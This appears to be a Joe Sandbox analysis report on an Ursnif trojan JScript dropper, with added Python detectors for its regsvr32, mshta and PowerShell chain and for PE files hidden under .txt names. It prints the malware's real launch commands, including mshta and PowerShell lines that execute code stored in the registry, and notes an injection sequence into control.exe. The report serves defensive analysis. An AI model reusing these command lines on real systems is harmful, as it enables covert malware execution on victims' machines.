Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_0507A395
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050793CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_050793CD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05078A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_05078A30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507CA3E GetProcAddress,NtCreateSection,memset,3_2_0507CA3E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507A27A NtQueryInformationProcess,3_2_0507A27A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050702DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_050702DF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05064D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_05064D66
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,3_2_0507C7BD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05077933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05077933
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05074968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_05074968
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506A99C NtGetContextThread,RtlNtStatusToDosError,3_2_0506A99C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507B07A NtQuerySystemInformation,RtlNtStatusToDosError,3_2_0507B07A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050773D6 memset,NtQueryInformationProcess,3_2_050773D6
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050693F0 CreateProcessAsUserA,3_2_050693F0
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_727225443_2_72722544
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05086D183_2_05086D18
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05081D5A3_2_05081D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050815703_2_05081570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05066F343_2_05066F34
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506CF553_2_0506CF55
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050727783_2_05072778
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05073F8C3_2_05073F8C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050826133_2_05082613
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05072EDE3_2_05072EDE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050910A23_2_050910A2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_050710DE3_2_050710DE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506DB4A3_2_0506DB4A
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt 216371A4A1B99CA2A47C2CDC6EF67995B0D8095E0D5AE193146A0B5B9FE8FB3A
JavaScript / VBScript file with very long strings (likely obfuscated code)
Source: open_attach_n2k.js | Initial sample: strings longer than 50 characters found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winJS@19/18@4/1
Contains functionality to enum processes or threads (the Thread32First / OpenThread / QueueUserAPC sequence in this function is also the standard APC-injection primitive; read it together with the injection entries under HIPS / PFW / Operating System Protection Evasion below)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05076887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 3_2_05076887
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\
Creates mutexes
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{03FAF906-86D7-2D49-A8E7-1AB15C0BEE75}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\DDdNGtqHaD.nfdQyjXrtb
Parts of this application use the .NET runtime (probably coded in C#). Caveat: the only evidence is powershell.exe loading mscorlib, which every PowerShell process does because PowerShell itself is a .NET host; this says nothing about whether the payload is managed code.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies (the Software Restriction Policy key; the script host consults it on every run)
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: open_attach_n2k.js | VirusTotal: Detection: 25%
Sample might require command line arguments. Caveat: this heuristic fires on the %u format specifier; the string reads as a path template for enumerating mail addresses, which fits the Outlook App Paths lookup above better than command-line usage text.
Source: regsvr32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\open_attach_n2k.js'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82952 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82960 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /? (started with a harmless help switch and then used as the injection target; see the memory allocation, memory write and thread-context entries under HIPS / PFW / Operating System Protection Evasion)
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82952 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5344 CREDAT:82960 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
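The durable detection content in the chain above is the shape, not the names: a script host launching regsvr32 against a .txt module, regsvr32 launching mshta with an inline about: HTA that eval()s a registry value, and mshta launching PowerShell that iex's a second registry value. The random file name and the GUID-keyed registry path change per campaign. The following is an added example, not code from the report or from Joe Sandbox: a small Python detector over process-creation records that keys on those three traits and on the parent-child lineage. The ProcEvent fields and the sample records are constructed here to mirror the entries above; that a Sysmon Event ID 1 export would supply the same three fields is an assumption about the reader's telemetry, not something the report shows.

```python
"""Added example (not from the Joe Sandbox report): flag the LOLBin chain seen above.

Records are (parent image, child image, command line), constructed here to mirror
the 'Spawns processes' entries; real telemetry such as Sysmon Event ID 1 carries the
same three fields (an assumption about the reader's log format).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # command line exactly as logged


# Extensions regsvr32 is legitimately asked to register; anything else is a red flag
REGSVR32_MODULE_EXTS = {".dll", ".ocx", ".ax", ".cpl"}

# Lineage observed in the report: script host -> regsvr32 -> mshta -> powershell
EXPECTED_CHAIN = [("wscript.exe", "regsvr32.exe"),
                  ("regsvr32.exe", "mshta.exe"),
                  ("mshta.exe", "powershell.exe")]

# Last argument on a command line, honouring single or double quotes
_LAST_ARG = re.compile(r"""("[^"]*"|'[^']*'|\S+)\s*$""")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, surrounding quotes stripped."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip("'\"").lower()


def check_regsvr32(ev: ProcEvent):
    """regsvr32 pointed at a module whose extension is not a registrable DLL type."""
    if basename(ev.image) != "regsvr32.exe":
        return None
    m = _LAST_ARG.search(ev.cmdline)
    if not m:
        return None
    target = m.group(1).strip("'\"")          # the module path is the last argument
    name = basename(target)
    ext = name[name.rfind("."):] if "." in name else ""
    if ext not in REGSVR32_MODULE_EXTS:
        return f"regsvr32 loading a non-DLL extension '{ext or '(none)'}': {target}"
    return None


def check_mshta(ev: ProcEvent):
    """mshta running an inline HTA that eval()s data pulled from the registry."""
    if basename(ev.image) != "mshta.exe":
        return None
    inline = re.search(r"(?i)\b(about|javascript|vbscript):", ev.cmdline)
    evals_registry = (re.search(r"(?i)\bRegRead\s*\(", ev.cmdline)
                      and re.search(r"(?i)\beval\s*\(", ev.cmdline))
    if inline and evals_registry:
        return "mshta inline script eval()s a registry value"
    return None


def check_powershell(ev: ProcEvent):
    """powershell Invoke-Expression over a value read with Get-ItemProperty from HKCU."""
    if basename(ev.image) != "powershell.exe":
        return None
    if (re.search(r"(?i)\b(iex|invoke-expression)\b", ev.cmdline)
            and re.search(r"(?i)\b(gp|get-itemproperty)\b[^)]*HKCU:", ev.cmdline)):
        return "PowerShell iex over a registry value under HKCU"
    return None


def chain_observed(events):
    """True when every parent->child edge of EXPECTED_CHAIN appears in the records."""
    edges = {(basename(e.parent), basename(e.image)) for e in events}
    return all(edge in edges for edge in EXPECTED_CHAIN)


def analyze(events):
    """Per-process findings plus whether the full chain is present."""
    findings = []
    for ev in events:
        for check in (check_regsvr32, check_mshta, check_powershell):
            hit = check(ev)
            if hit:
                findings.append((basename(ev.image), hit))
    return {"findings": findings, "chain": chain_observed(events)}


# Command lines copied from the report's 'Spawns processes' entries
MSHTA_CMD = (r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
             r"eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software"
             r"\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'")
PS_CMD = (r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII"
          r".GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))")

SAMPLE_EVENTS = [  # constructed from the report's process tree, plus one benign control record
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\regsvr32.exe",
              r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
              r"-s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt"),
    ProcEvent(r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\mshta.exe", MSHTA_CMD),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe /?"),
    ProcEvent(r"C:\Program Files\Example\setup.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Example\comp.dll"'),  # benign COM registration
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for image, hit in result["findings"]:
        print(f"{image}: {hit}")
    print("full chain present:", result["chain"])
```

Both regsvr32 records fire (the 64-bit instance and the WOW64 re-launch it spawns), the mshta and PowerShell records fire on their own, and the control.exe launch and the benign installer registration stay silent; the chain check is the piece that turns four medium-confidence hits into one high-confidence alert.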
Uses an in-process (OLE) Automation server (the CLSID is the JScript engine; wscript resolving its own script engine, not a third-party component)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Reads Internet Explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: more than 3 window changes detected
Uses Microsoft Silverlight. Mislabelled: mscorrc.dll is the .NET Framework runtime resource library that powershell.exe loads on every run; no Silverlight component is involved.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: open_attach_n2k.js | Static file information: file size 1691178 > 1048576
Uses new MSVCR DLLs
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols (ntdll.pdb and rundll32.pdb are Windows' own; only the last entry comes from the dropped module and is attributable to the attacker's build environment)
Source: Binary string: ntdll.pdb | source: regsvr32.exe, 00000003.00000003.1488789608.0000000005800000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: regsvr32.exe, 00000003.00000003.1488789608.0000000005800000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb | source: control.exe, 0000000F.00000002.1505371254.00000184265BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL | source: control.exe, 0000000F.00000002.1505371254.00000184265BC000.00000004.00000040.sdmp
Source: Binary string: c:\All\Cloud\Stay\case\Dance\Took\Figureparagraph.pdb | source: regsvr32.exe, PGpPBocoGo.txt.0.dr

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt");
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05076450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_05076450
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72722533 push ecx; ret 3_2_72722543
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_727224E0 push ecx; ret 3_2_727224E9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05086D07 push ecx; ret 3_2_05086D17
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_050869A0 push ecx; ret 3_2_050869A9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0508BA4E push ds; retn 0002h 3_2_0508BA69
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0508BA74 push edx; retn 0002h 3_2_0508BA75
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0508BA98 push edx; ret 3_2_0508BAAD

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt
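The two entries above describe one fact from two angles: the file wscript wrote to %TEMP% carries a .txt name but is a PE image, and regsvr32 loads it anyway because the loader keys on the headers, not on the extension. As an added example (not from the report, and not reproducing the dropped file), the following Python inspects the DOS and COFF headers directly and reports any PE stored under a non-PE extension, telling a DLL from an EXE by the IMAGE_FILE_DLL characteristic. The header bytes it tests against are constructed in memory; only the dropped path name is taken from the report.

```python
"""Added example (not from the Joe Sandbox report): PE content under a non-PE extension.

parse_pe_header() reads only the DOS and COFF file headers; the sample images used
below are constructed in memory and are not loadable binaries.
"""
import struct

IMAGE_FILE_DLL = 0x2000           # COFF Characteristics bit: image is a DLL
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr", ".drv", ".ax"}
_COFF = struct.Struct("<HHIIIHH")  # Machine, NumberOfSections, TimeDateStamp,
                                    # PointerToSymbolTable, NumberOfSymbols,
                                    # SizeOfOptionalHeader, Characteristics


def parse_pe_header(data: bytes):
    """Return (is_pe, is_dll, machine); (False, False, None) when not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, False, None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 + _COFF.size > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, False, None
    machine, *_rest, characteristics = _COFF.unpack_from(data, e_lfanew + 4)
    return True, bool(characteristics & IMAGE_FILE_DLL), machine


def extension_of(filename: str) -> str:
    """Lower-cased extension including the dot, or '' when the name has none."""
    name = filename.replace("/", "\\").rsplit("\\", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def extension_mismatch(filename: str, data: bytes):
    """Describe a PE stored under a non-PE extension, or None when consistent."""
    is_pe, is_dll, machine = parse_pe_header(data)
    ext = extension_of(filename)
    if is_pe and ext not in PE_EXTENSIONS:
        kind = "DLL" if is_dll else "EXE"
        return f"{filename}: PE {kind} (machine 0x{machine:04X}) stored as '{ext or '(none)'}'"
    return None


def build_minimal_pe(is_dll: bool, machine: int = 0x014C) -> bytes:
    """Constructed DOS stub + PE signature + COFF header, just enough for the parser."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE, plus the DLL bit on request
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)
    return bytes(dos) + b"PE\0\0" + _COFF.pack(machine, 1, 0, 0, 0, 0xE0, characteristics)


# Constructed corpus: the dropped name from the report with a fake DLL body, plus controls
SAMPLE_DROPS = {
    r"C:\Users\user\AppData\Local\Temp\PGpPBocoGo.txt": build_minimal_pe(is_dll=True),
    r"C:\Users\user\AppData\Local\Temp\notes.txt": b"just text, no MZ header",
    r"C:\Program Files\Example\comp.dll": build_minimal_pe(is_dll=True),
    r"C:\Users\user\AppData\Local\Temp\tool.bin": build_minimal_pe(is_dll=False, machine=0x8664),
}


def scan_dropped(files):
    """Return [(path, description)] for every file whose content contradicts its extension."""
    hits = []
    for path, data in files.items():
        desc = extension_mismatch(path, data)
        if desc:
            hits.append((path, desc))
    return hits


if __name__ == "__main__":
    for _path, desc in scan_dropped(SAMPLE_DROPS):
        print(desc)
```

On a live host the same check belongs in the file-creation path for script hosts (wscript, cscript, mshta, powershell): a PE written by any of them under a non-PE name is worth an alert on its own, before regsvr32 or rundll32 ever touches it.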

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif (matches in the memory of a regsvr32.exe instance, PID 3660, and of the injected control.exe host, PID 5160)
Source: Yara match | File source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (123 occurrences)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (this value is TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively infinite wait)
Found WSH timer for JavaScript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2744
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 8.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692 | Thread sleep time: -922337203685477s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0506CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0506CDF2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0507940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 3_2_0507940E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05068181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_05068181
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05077CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 3_2_05077CDC
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72721C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 3_2_72721C57
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05076450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_05076450
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7273C590 mov eax, dword ptr fs:[00000030h] 3_2_7273C590
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7273C0D0 push dword ptr fs:[00000030h] 3_2_7273C0D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7273C4C6 mov eax, dword ptr fs:[00000030h] 3_2_7273C4C6
Contains functionality to register its own exception handler
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_7272223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, 3_2_7272223F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0506C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_0506C0D6

